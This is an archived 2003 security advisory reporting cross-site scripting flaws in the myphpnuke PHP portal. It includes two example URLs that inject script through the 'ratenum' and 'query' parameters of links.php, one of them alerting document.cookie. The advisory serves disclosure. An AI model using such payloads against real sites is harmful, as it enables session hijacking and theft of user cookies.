TUCoPS :: Web :: General :: sb6004.htm

myphpnuke xss
20th Feb 2003 [SBWID-6004]
COMMAND

	myphpnuke xss

SYSTEMS AFFECTED

	?

PROBLEM

	Tacettin Karadeniz [tacettinkaradeniz@yahoo.com] says :
	
	myphpnuke is a website portal tool written in php. There are many  Cross
	Site Scripting issue on myphpnuke.
	
	 Example:
	 ========
	
	http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent
	http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@olympos.org');[/scr!pt]?query=
	
	
	

SOLUTION

	?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH